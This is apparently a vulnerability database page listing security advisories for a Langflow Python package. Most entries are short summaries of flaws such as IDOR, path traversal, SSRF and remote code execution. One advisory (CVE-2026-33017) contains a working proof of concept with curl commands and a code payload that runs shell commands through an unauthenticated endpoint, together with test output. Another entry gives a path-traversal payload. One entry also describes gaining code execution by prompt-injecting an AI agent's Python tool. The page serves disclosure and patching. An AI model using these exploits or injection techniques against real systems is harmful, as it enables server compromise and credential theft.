Search for packages
| purl | pkg:pypi/langflow@0.6.5a4 |
| Vulnerability | Summary | Fixed by |
|---|---|---|
|
VCID-1dek-kvzf-27d1
Aliases: CVE-2026-34046 GHSA-8c4j-f57c-35cf |
Langflow: Authenticated Users Can Read, Modify, and Delete Any Flow via Missing Ownership Check ## Vulnerability ### IDOR in `GET/PATCH/DELETE /api/v1/flow/{flow_id}` The `_read_flow` helper in `src/backend/base/langflow/api/v1/flows.py` branched on the `AUTO_LOGIN` setting to decide whether to filter by `user_id`. When `AUTO_LOGIN` was `False` (i.e., authentication was enabled), neither branch enforced an ownership check — the query returned any flow matching the given UUID regardless of who owned it. This exposed any authenticated user to: - **Read** any other user's flow, including embedded plaintext API keys - **Modify** the logic of another user's AI agents - **Delete** flows belonging to other users The vulnerability was introduced by the conditional logic that was meant to accommodate public/example flows (those with `user_id = NULL`) under auto-login mode, but inadvertently left the authenticated path without an ownership filter. --- ## Fix (PR #8956) The fix removes the `AUTO_LOGIN` conditional entirely and unconditionally scopes the query to the requesting user: ```diff - auth_settings = settings_service.auth_settings - stmt = select(Flow).where(Flow.id == flow_id) - if auth_settings.AUTO_LOGIN: - stmt = stmt.where( - (Flow.user_id == user_id) | (Flow.user_id == None) # noqa: E711 - ) + stmt = select(Flow).where(Flow.id == flow_id).where(Flow.user_id == user_id) ``` All three operations — read, update, and delete — route through `_read_flow`, so the single change covers the full attack surface. A cross-user isolation test (`test_read_flows_user_isolation`) was added to prevent regression. --- ## Acknowledgements Langflow thanks the security researcher who responsibly disclosed this vulnerability: - **[@chximn-dt](https://github.com/chximn-dt)** |
Affected by 16 other vulnerabilities. |
|
VCID-1ynd-c2hz-53hx
Aliases: CVE-2026-27966 GHSA-3645-fxcv-hqr4 |
Langflow has Remote Code Execution in CSV Agent The CSV Agent node in Langflow hardcodes `allow_dangerous_code=True`, which automatically exposes LangChain’s Python REPL tool (`python_repl_ast`). As a result, an attacker can execute arbitrary Python and OS commands on the server via prompt injection, leading to full Remote Code Execution (RCE). | There are no reported fixed by versions. |
|
VCID-2195-gd33-xbdp
Aliases: CVE-2026-42048 GHSA-9whx-c884-c68q |
Langflow Knowledge Bases API is Vulnerable to Path Traversal ## Summary Langflow is vulnerable to Path Traversal in the Knowledge Bases API (`DELETE /api/v1/knowledge_bases`). This occurs because user-supplied knowledge base names are concatenated directly into file paths without proper sanitization or boundary validation. An authenticated attacker can exploit this flaw to delete arbitrary directories anywhere on the server's filesystem, leading to data loss and potential service disruption. ## Details The vulnerability exists in the `delete_knowledge_bases_bulk` function within `src/backend/base/langflow/api/v1/knowledge_bases.py`. This function constructs file paths directly from the user-supplied `kb_names` parameter. While other knowledge base endpoints safely route through standard path resolution (e.g., `_resolve_kb_path()`), the bulk delete handler bypasses this entirely. It builds the path manually and passes it directly to `shutil.rmtree()` without validating if the resulting path resolves outside the intended user directory. ## PoC (Proof of Concept) For the **Bulk Delete** endpoint, an authenticated attacker can supply a traversal sequence in the `kb_names` parameter: `../victim_user/kb_name` Because the path is passed directly to `shutil.rmtree()` without containment checks, this payload deletes directories outside the intended scope. ## Impact Any Langflow instance exposing this endpoint to authenticated users is vulnerable. This exposes the server to: * **Cross-user data compromise:** Deletion of directories within another tenant's knowledge base space. * **Arbitrary filesystem manipulation:** Directory deletion at any path on the server where the application has write permissions. * **Service disruption & Data Loss:** Deletion of critical application files or unrecoverable data loss if backups are co-located on the same filesystem. ## Fixes The issue was addressed in **PR #12243**, which applies `Path.resolve()` to normalize the supplied path and validates that it starts with the authenticated user's directory before deletion. Subsequent updates (backported from PR #12337) introduced robust containment checks using `Path.is_relative_to()` to prevent prefix-ambiguity bugs. ## Acknowledgements Thanks to the security researchers who responsibly disclosed this vulnerability: * @ddlxstudio * @nekros1xx |
Affected by 1 other vulnerability. |
|
VCID-2649-thqq-r3d2
Aliases: CVE-2026-6599 GHSA-v66p-f7x3-4794 |
Langflow vulnerable to injection A vulnerability was detected in langflow-ai langflow up to 1.8.3. The impacted element is the function get_client_ip/install_mcp_config of the file src/backend/base/langflow/api/v1/mcp_projects.py of the component Model Context Protocol Configuration API. Performing a manipulation of the argument X-Forwarded-For results in injection. The attack may be initiated remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. |
Affected by 6 other vulnerabilities. |
|
VCID-9k4q-zwxf-euh1
Aliases: CVE-2024-9277 GHSA-355v-2rjx-fpx7 |
Inefficient Regular Expression Complexity in langflow A vulnerability classified as problematic was found in Langflow up to 1.0.18. Affected by this vulnerability is an unknown functionality of the file \src\backend\base\langflow\interface\utils.py of the component HTTP POST Request Handler. The manipulation of the argument remaining_text leads to inefficient regular expression complexity. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | There are no reported fixed by versions. |
|
VCID-bb6r-1f6u-t7ed
Aliases: CVE-2025-68477 GHSA-5993-7p27-66g5 |
Langflow vulnerable to Server-Side Request Forgery **Vulnerability Overview** Langflow provides an API Request component that can issue arbitrary HTTP requests within a flow. This component takes a user-supplied URL, performs only normalization and basic format checks, and then sends the request using a server-side httpx client. It does not block private IP ranges (127.0.0.1, the 10/172/192 ranges) or cloud metadata endpoints (169.254.169.254), and it returns the response body as the result. Because the flow execution endpoints (/api/v1/run, /api/v1/run/advanced) can be invoked with just an API key, if an attacker can control the API Request URL in a flow, non-blind SSRF is possible—accessing internal resources from the server’s network context. This enables requests to, and collection of responses from, internal administrative endpoints, metadata services, and internal databases/services, leading to information disclosure and providing a foothold for further attacks. **Vulnerable Code** 1. When a flow runs, the API Request URL is set via user input or tweaks, or it falls back to the value stored in the node UI. |
Affected by 11 other vulnerabilities. |
|
VCID-ef87-295y-zbha
Aliases: CVE-2024-37014 GHSA-qg33-x2c5-6p44 PYSEC-2024-177 |
Langflow through 0.6.19 allows remote code execution if untrusted users are able to reach the "POST /api/v1/custom_component" endpoint and provide a Python script. |
Affected by 22 other vulnerabilities. Affected by 21 other vulnerabilities. |
|
VCID-fc5h-qc2t-xqc3
Aliases: CVE-2025-57760 GHSA-4gv9-mp8m-592r |
Langflow Vulnerable to Privilege Escalation via CLI Superuser Creation (Post-RCE) A privilege escalation vulnerability exists in Langflow containers where an authenticated user with RCE access can invoke the internal CLI command **langflow superuser** to create a new administrative user. This results in full superuser access, even if the user initially registered through the UI as a regular (non-admin) account. |
Affected by 16 other vulnerabilities. |
|
VCID-jt18-vv56-2fgx
Aliases: CVE-2024-48061 GHSA-5p5r-57fx-pmfr |
Langflow vulnerable to remote code execution langflow <=1.0.18 is vulnerable to Remote Code Execution (RCE) as any component provided the code functionality and the components run on the local machine rather than in a sandbox. |
Affected by 19 other vulnerabilities. |
|
VCID-ncvf-vzqr-uydz
Aliases: CVE-2026-33497 GHSA-ph9w-r52h-28p7 PYSEC-2026-81 |
Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.7.1, in the download_profile_picture function of the /profile_pictures/{folder_name}/{file_name} endpoint, the folder_name and file_name parameters are not strictly filtered, which allows the secret_key to be read across directories. Version 1.7.1 contains a patch. |
Affected by 11 other vulnerabilities. |
|
VCID-q4r1-xjfk-7bg9
Aliases: CVE-2026-33053 GHSA-rf6x-r45m-xv3w PYSEC-2026-78 |
Langflow is a tool for building and deploying AI-powered agents and workflows. In versions prior to 1.9.0, the delete_api_key_route() endpoint accepts an api_key_id path parameter and deletes it with only a generic authentication check (get_current_active_user dependency). However, the delete_api_key() CRUD function does NOT verify that the API key belongs to the current user before deletion. |
Affected by 11 other vulnerabilities. Affected by 1 other vulnerability. |
|
VCID-qwtw-q92t-quhz
Aliases: CVE-2026-21445 GHSA-c5cp-vx83-jhqx |
Langflow Missing Authentication on Critical API Endpoints Multiple critical API endpoints in Langflow are missing authentication controls, allowing any unauthenticated user to access sensitive user conversation data, transaction histories, and perform destructive operations including message deletion. This affects endpoints handling personal data and system operations that should require proper authorization. |
Affected by 11 other vulnerabilities. |
|
VCID-rc54-gw71-gyau
Aliases: CVE-2026-0770 GHSA-g22f-v6f7-2hrh |
Langflow affected by Remote Code Execution via validate_code() exec() Langflow exec_globals Inclusion of Functionality from Untrusted Control Sphere Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Langflow. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the exec_globals parameter provided to the validate endpoint. The issue results from the inclusion of a resource from an untrusted control sphere. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27325. | There are no reported fixed by versions. |
|
VCID-s17d-sfjq-z7eg
Aliases: CVE-2024-42835 GHSA-56m6-4mhw-h3g5 PYSEC-2024-279 |
langflow v1.0.12 was discovered to contain a remote code execution (RCE) vulnerability via the PythonCodeTool component. |
Affected by 21 other vulnerabilities. |
|
VCID-sbea-kkfu-akgb
Aliases: CVE-2025-68478 GHSA-f43r-cc68-gpx4 PYSEC-2025-125 |
Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.7.0, if an arbitrary path is specified in the request body's `fs_path`, the server serializes the Flow object into JSON and creates/overwrites a file at that path. There is no path restriction, normalization, or allowed directory enforcement, so absolute paths (e.g., /etc/poc.txt) are interpreted as is. Version 1.7.0 fixes the issue. |
Affected by 15 other vulnerabilities. Affected by 11 other vulnerabilities. |
|
VCID-u8mw-7znw-rfab
Aliases: CVE-2026-6597 GHSA-5jjf-wcvf-923w |
Langflow has an Information Leak through Incomplete API Key Redaction A weakness has been identified in langflow-ai langflow up to 1.8.3. Impacted is the function remove_api_keys/has_api_terms of the file src/backend/base/langflow/api/utils/core.py of the component Flow Using API. This manipulation causes unprotected storage of credentials. The attack can be initiated remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. |
Affected by 6 other vulnerabilities. |
|
VCID-v5pc-pdm9-97g8
Aliases: CVE-2026-33873 GHSA-v8hw-mh8c-jxfc PYSEC-2026-82 |
Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.9.0, the Agentic Assistant feature in Langflow executes LLM-generated Python code during its validation phase. Although this phase appears intended to validate generated component code, the implementation reaches dynamic execution sinks and instantiates the generated class server-side. In deployments where an attacker can access the Agentic Assistant feature and influence the model output, this can result in arbitrary server-side Python execution. Version 1.9.0 fixes the issue. |
Affected by 1 other vulnerability. |
|
VCID-wv26-29b9-vqgg
Aliases: CVE-2025-3248 GHSA-rvqx-wpfh-mfx7 PYSEC-2025-36 |
Langflow versions prior to 1.3.0 are susceptible to code injection in the /api/v1/validate/code endpoint. A remote and unauthenticated attacker can send crafted HTTP requests to execute arbitrary code. |
Affected by 18 other vulnerabilities. |
|
VCID-ypxh-x2hy-3uhb
Aliases: CVE-2026-6598 GHSA-9jpj-cph8-w449 |
Langflow: Cleartext Storage of Authentication Settings in Project Creation Endpoint A security vulnerability has been detected in langflow-ai langflow up to 1.8.3. The affected element is the function create_project/encrypt_auth_settings of the file src/backend/base/Langflow/api/v1/projects.py of the component Project Creation Endpoint. Such manipulation of the argument auth_settings leads to cleartext storage in a file or on disk. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. |
Affected by 0 other vulnerabilities. |
|
VCID-ysnc-jyxb-6qcy
Aliases: CVE-2025-34291 GHSA-577h-p2hh-v4mv PYSEC-2025-78 |
Langflow versions up to and including 1.6.9 contain a chained vulnerability that enables account takeover and remote code execution. An overly permissive CORS configuration (allow_origins='*' with allow_credentials=True) combined with a refresh token cookie configured as SameSite=None allows a malicious webpage to perform cross-origin requests that include credentials and successfully call the refresh endpoint. An attacker-controlled origin can therefore obtain fresh access_token / refresh_token pairs for a victim session. Obtained tokens permit access to authenticated endpoints — including built-in code-execution functionality — allowing the attacker to execute arbitrary code and achieve full system compromise. |
Affected by 15 other vulnerabilities. |
|
VCID-zqwj-45w7-7kft
Aliases: CVE-2026-33017 GHSA-vwmf-pq79-vjvx |
Unauthenticated Remote Code Execution in Langflow via Public Flow Build Endpoint ## Summary The `POST /api/v1/build_public_tmp/{flow_id}/flow` endpoint allows building public flows without requiring authentication. When the optional `data` parameter is supplied, the endpoint uses **attacker-controlled flow data** (containing arbitrary Python code in node definitions) instead of the stored flow data from the database. This code is passed to `exec()` with zero sandboxing, resulting in unauthenticated remote code execution. This is distinct from CVE-2025-3248, which fixed `/api/v1/validate/code` by adding authentication. The `build_public_tmp` endpoint is **designed** to be unauthenticated (for public flows) but incorrectly accepts attacker-supplied flow data containing arbitrary executable code. ## Affected Code ### Vulnerable Endpoint (No Authentication) **File:** `src/backend/base/langflow/api/v1/chat.py`, lines 580-657 ```python @router.post("/build_public_tmp/{flow_id}/flow") async def build_public_tmp( *, flow_id: uuid.UUID, data: Annotated[FlowDataRequest | None, Body(embed=True)] = None, # ATTACKER CONTROLLED request: Request, # ... NO Depends(get_current_active_user) -- MISSING AUTH ... ): """Build a public flow without requiring authentication.""" client_id = request.cookies.get("client_id") owner_user, new_flow_id = await verify_public_flow_and_get_user(flow_id=flow_id, client_id=client_id) job_id = await start_flow_build( flow_id=new_flow_id, data=data, # Attacker's data passed directly to graph builder current_user=owner_user, ... ) ``` Compare with the authenticated build endpoint at line 138, which requires `current_user: CurrentActiveUser`. ### Code Execution Chain When attacker-supplied `data` is provided, it flows through: 1. `start_flow_build(data=attacker_data)` → `generate_flow_events()` -- `build.py:81` 2. `create_graph()` → `build_graph_from_data(payload=data.model_dump())` -- `build.py:298` 3. `Graph.from_payload(payload)` parses attacker nodes -- `base.py:1168` 4. `add_nodes_and_edges()` → `initialize()` → `_build_graph()` -- `base.py:270,527` 5. `_instantiate_components_in_vertices()` iterates nodes -- `base.py:1323` 6. `vertex.instantiate_component()` → `instantiate_class(vertex)` -- `loading.py:28` 7. `code = custom_params.pop("code")` extracts attacker code -- `loading.py:43` 8. `eval_custom_component_code(code)` → `create_class(code, class_name)` -- `eval.py:9` 9. `prepare_global_scope(module)` -- `validate.py:323` 10. `exec(compiled_code, exec_globals)` -- **ARBITRARY CODE EXECUTION** -- `validate.py:397` ### Unsandboxed exec() in prepare_global_scope **File:** `src/lfx/src/lfx/custom/validate.py`, lines 340-397 ```python def prepare_global_scope(module): exec_globals = globals().copy() # Imports are resolved first (any module can be imported) for node in imports: module_obj = importlib.import_module(module_name) # line 352 exec_globals[variable_name] = module_obj # Then ALL top-level definitions are executed (Assign, ClassDef, FunctionDef) if definitions: combined_module = ast.Module(body=definitions, type_ignores=[]) compiled_code = compile(combined_module, "<string>", "exec") exec(compiled_code, exec_globals) # line 397 - ARBITRARY CODE EXECUTION ``` **Critical detail:** `prepare_global_scope` executes `ast.Assign` nodes. An attacker's code like `_x = os.system("id")` is an assignment and will be executed during graph building -- before the flow even "runs." ## Prerequisites 1. Target Langflow instance has at least **one public flow** (common for demos, chatbots, shared workflows) 2. Attacker knows the public flow's UUID (discoverable via shared links/URLs) 3. No authentication required -- only a `client_id` cookie (any arbitrary string value) When `AUTO_LOGIN=true` (the **default**), all prerequisites can be met by an unauthenticated attacker: 1. `GET /api/v1/auto_login` → obtain superuser token 2. `POST /api/v1/flows/` → create a public flow 3. Exploit via `build_public_tmp` without any auth ## Proof of Concept ### Tested Against - **Langflow version 1.7.3** (latest stable release, installed via `pip install langflow`) - **Fully reproducible**: 6/6 runs confirmed RCE (two sets of 3 runs each) ### Step 1: Obtain a Public Flow ID (In a real attack, the attacker discovers this via shared links. For the PoC, we create one via AUTO_LOGIN.) ```bash # Get superuser token (no credentials needed when AUTO_LOGIN=true) TOKEN=$(curl -s http://localhost:7860/api/v1/auto_login | jq -r '.access_token') # Create a public flow FLOW_ID=$(curl -s -X POST http://localhost:7860/api/v1/flows/ \ -H "Authorization: Bearer $TOKEN" \ -H "Content-Type: application/json" \ -d '{"name":"test","data":{"nodes":[],"edges":[]},"access_type":"PUBLIC"}' \ | jq -r '.id') echo "Public Flow ID: $FLOW_ID" ``` ### Step 2: Exploit -- Unauthenticated RCE ```bash # EXPLOIT: Send malicious flow data to the UNAUTHENTICATED endpoint # NO Authorization header, NO API key, NO credentials curl -X POST "http://localhost:7860/api/v1/build_public_tmp/${FLOW_ID}/flow" \ -H "Content-Type: application/json" \ -b "client_id=attacker" \ -d '{ "data": { "nodes": [{ "id": "Exploit-001", "type": "genericNode", "position": {"x":0,"y":0}, "data": { "id": "Exploit-001", "type": "ExploitComp", "node": { "template": { "code": { "type": "code", "required": true, "show": true, "multiline": true, "value": "import os, socket, json as _json\n\n_proof = os.popen(\"id\").read().strip()\n_host = socket.gethostname()\n_write = open(\"/tmp/rce-proof\",\"w\").write(f\"{_proof} on {_host}\")\n\nfrom lfx.custom.custom_component.component import Component\nfrom lfx.io import Output\nfrom lfx.schema.data import Data\n\nclass ExploitComp(Component):\n display_name=\"X\"\n outputs=[Output(display_name=\"O\",name=\"o\",method=\"r\")]\n def r(self)->Data:\n return Data(data={})", "name": "code", "password": false, "advanced": false, "dynamic": false }, "_type": "Component" }, "description": "X", "base_classes": ["Data"], "display_name": "ExploitComp", "name": "ExploitComp", "frozen": false, "outputs": [{"types":["Data"],"selected":"Data","name":"o","display_name":"O","method":"r","value":"__UNDEFINED__","cache":true,"allows_loop":false,"tool_mode":false,"hidden":null,"required_inputs":null,"group_outputs":false}], "field_order": ["code"], "beta": false, "edited": false } } }], "edges": [] }, "inputs": null }' ``` ### Step 3: Verify Code Execution ```bash # Wait 2 seconds for async graph building sleep 2 # Check proof file written by attacker's code on the server cat /tmp/rce-proof # Output: uid=1000(aviral) gid=1000(aviral) groups=... on kali ``` ### Actual Test Results ``` ====================================================================== LANGFLOW v1.7.3 UNAUTHENTICATED RCE - DEFINITIVE E2E TEST ====================================================================== Version: Langflow 1.7.3 RUN 1: POST /api/v1/build_public_tmp/{id}/flow (NO AUTH) HTTP 200 - Job ID: d8db19bf-a532-4f9d-a368-9c46d6235c19 *** REMOTE CODE EXECUTION CONFIRMED *** canary: RCE-f0d19b36 hostname: kali uid: 1000 whoami: aviral id: uid=1000(aviral) gid=1000(aviral) groups=1000(aviral),... uname: Linux 6.16.8+kali-amd64 RUN 2: POST /api/v1/build_public_tmp/{id}/flow (NO AUTH) HTTP 200 - Job ID: d2e24f20-d707-4278-868c-583dd7532832 *** REMOTE CODE EXECUTION CONFIRMED *** canary: RCE-6037a271 RUN 3: POST /api/v1/build_public_tmp/{id}/flow (NO AUTH) HTTP 200 - Job ID: 5962244a-42af-4ef6-b134-a6a4adba5ab7 *** REMOTE CODE EXECUTION CONFIRMED *** canary: RCE-4a796556 FINAL RESULTS Total checks: 15 VULNERABLE: 15 SAFE: 0 RCE confirmed: 3/3 runs Reproducible: YES (100%) ``` ## Impact - **Unauthenticated Remote Code Execution** with full server process privileges - **Complete server compromise**: arbitrary file read/write, command execution - **Environment variable exfiltration**: API keys, database credentials, cloud tokens (confirmed in PoC: env_keys exfiltrated) - **Reverse shell access** for persistent access - **Lateral movement** within the network - **Data exfiltration** from all flows, messages, and stored credentials in the database ## Comparison with CVE-2025-3248 | Aspect | CVE-2025-3248 | This Vulnerability | |--------|--------------|-------------------| | **Endpoint** | `/api/v1/validate/code` | `/api/v1/build_public_tmp/{id}/flow` | | **Fix applied** | Added `Depends(get_current_active_user)` | None -- NEW vulnerability | | **Root cause** | Missing auth on code validation | Unauthenticated endpoint accepts attacker-controlled executable code via `data` param | | **Code execution via** | `validate_code()` → `exec()` | `create_class()` → `prepare_global_scope()` → `exec()` | | **CISA KEV** | Yes (actively exploited) | N/A (new finding) | | **Can simple auth fix?** | Yes (and it was fixed) | No -- endpoint is *designed* to be unauthenticated; the `data` parameter must be removed | ## Recommended Fix ### Immediate (Short-term) **Remove the `data` parameter** from `build_public_tmp`. Public flows should only execute their stored flow data, never attacker-supplied data: ```python @router.post("/build_public_tmp/{flow_id}/flow") async def build_public_tmp( *, flow_id: uuid.UUID, inputs: Annotated[InputValueRequest | None, Body(embed=True)] = None, # REMOVED: data parameter -- public flows must use stored data only ... ): ``` In `generate_flow_events` → `create_graph()`, only the `build_graph_from_db` path should be reachable for unauthenticated requests: ```python async def create_graph(fresh_session, flow_id_str, flow_name): # For public flows, ALWAYS load from database, never from user data return await build_graph_from_db( flow_id=flow_id, session=fresh_session, ... ) ``` | There are no reported fixed by versions. |
|
VCID-ztx2-wefa-c7bk
Aliases: GHSA-c995-4fw3-j39m |
Duplicate Advisory: Langflow Vulnerable to Code Injection via the `/api/v1/validate/code` endpoint ### Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-rvqx-wpfh-mfx7. This link is maintained to preserve external references. ### Original Description Langflow versions prior to 1.3.0 are susceptible to code injection in the `/api/v1/validate/code` endpoint. A remote and unauthenticated attacker can send crafted HTTP requests to execute arbitrary code. |
Affected by 18 other vulnerabilities. |
| Vulnerability | Summary | Aliases |
|---|---|---|
| This package is not known to fix vulnerabilities. | ||